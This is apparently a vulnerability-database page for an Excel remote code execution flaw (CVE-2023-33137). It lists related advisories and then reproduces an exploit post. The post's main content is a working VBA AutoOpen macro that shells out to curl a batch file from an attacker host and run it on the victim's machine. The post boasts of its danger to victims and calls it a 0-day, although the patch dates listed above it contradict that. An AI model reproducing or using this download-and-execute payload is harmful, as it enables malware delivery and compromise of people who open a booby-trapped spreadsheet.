Microsoft Excel 365 MSO Remote Code Execution Vulnerabilit
Reporter | Title | Published | Views | Family All 18 |
---|---|---|---|---|
Prion | Remote code execution | 14 Jun 202300:15 | โ | prion |
Cvelist | CVE-2023-33137 Microsoft Excel Remote Code Execution Vulnerability | 13 Jun 202323:25 | โ | cvelist |
Exploit DB | Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) | 3 Jul 202300:00 | โ | exploitdb |
NVD | CVE-2023-33137 | 14 Jun 202300:15 | โ | nvd |
CVE | CVE-2023-33137 | 14 Jun 202300:15 | โ | cve |
AttackerKB | CVE-2023-33137 | 14 Jun 202300:00 | โ | attackerkb |
Microsoft CVE | Microsoft Excel Remote Code Execution Vulnerability | 13 Jun 202307:00 | โ | mscve |
Microsoft KB | Description of the security update for Office Online Server: June 13, 2023 (KB5002401) | 13 Jun 202307:00 | โ | mskb |
Microsoft KB | Description of the security update for Excel 2013: June 13, 2023 (KB5002414) | 13 Jun 202307:00 | โ | mskb |
Microsoft KB | Description of the security update for Excel 2016: June 13, 2023 (KB5002405) | 13 Jun 202307:00 | โ | mskb |
`## Title: Microsoft Excel Microsoftยฎ Microsoft 365 MSO (Version 2305
Build 16.0.16501.20074) 32-bit Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
This exploit is connected with third part exploit server, which waits
for the victim to call him and execute the content from him using the
pipe posting method! This is absolutely a 0-day exploit! This is
absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST
request to the exploit server, and the server is responding back that
way: He creates another hidden malicious file and executed it directly
on the machine of the victim, then everything is disappeared, so
nasty.
STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
## Time spend:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo